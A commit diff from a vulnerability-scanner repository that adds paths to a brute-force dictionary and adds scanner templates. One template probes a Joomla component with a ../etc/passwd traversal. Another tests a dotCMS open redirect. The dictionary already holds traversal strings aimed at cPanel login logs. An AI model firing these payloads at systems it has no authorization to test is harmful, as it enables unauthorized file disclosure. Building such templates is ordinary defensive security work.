add /server-info.action 2023-10-06

Author: hktalent

brute/dicts/filedic.txt

@@ -1,6 +1,8 @@
 /Login.jsp
 /login.jsp
 .*org/login
+/confluence/server-info.action
+/server-info.action
 ../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log%00
 ../../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log
 ../../../../../../../../../../../../../../../../../usr/local/cpanel/logs/login_log

config/51pwn/TPALL/2.yaml renamed to config/51pwn/2.yaml

@@ -6,7 +6,7 @@ info:
   reference:
     - https://sourceforge.net/projects/krw/
     - https://www.exploit-db.com/exploits/10216
-  author:nithissh
+  author: geeknik
   severity: high
   tags: cve,cve2009,krweb,rfi
 

config/51pwn/TPALL/74cms-workflow.yaml renamed to config/51pwn/74cms-workflow.yaml

@@ -0,0 +1,30 @@
+id: CVE-2010-1313
+
+info:
+  name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/12082
+    - https://www.cvedetails.com/cve/CVE-2010-1313
+    - http://web.archive.org/web/20210121195302/https://www.securityfocus.com/bid/39237/
+    - http://www.securityfocus.com/bid/39237
+  remediation: Upgrade to a supported version.
+  classification:
+    cve-id: CVE-2010-1313
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/02/14

config/51pwn/TPALL/AEM_misconfig.yaml renamed to config/51pwn/AEM_misconfig.yaml

@@ -6,7 +6,7 @@ info:
   reference:
     - https://seclists.org/fulldisclosure/2015/Dec/117
     - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01
-  author: nithissh
+  author: geeknik
   severity: medium
   tags: cve,cve2015,xss,iot,nordex,nc2
 

config/51pwn/TPALL/Actuator.yaml renamed to config/51pwn/Actuator.yaml

@@ -0,0 +1,39 @@
+id: CVE-2018-17422
+
+info:
+  name: dotCMS < 5.0.2 - Open Redirect
+  author: 0x_Akoko,daffainfo
+  severity: medium
+  description: |
+    dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter.
+  reference:
+    - https://github.com/dotCMS/core/issues/15286
+    - https://www.cvedetails.com/cve/CVE-2018-17422
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-17422
+    cwe-id: CWE-601
+  metadata:
+    shodan-query: http.title:"dotCMS"
+    verified: "true"
+  tags: cve,cve2018,redirect,dotcms
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
+      - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "self.location = 'http://www.interact.sh'"
+
+      - type: status
+        status:
+          - 200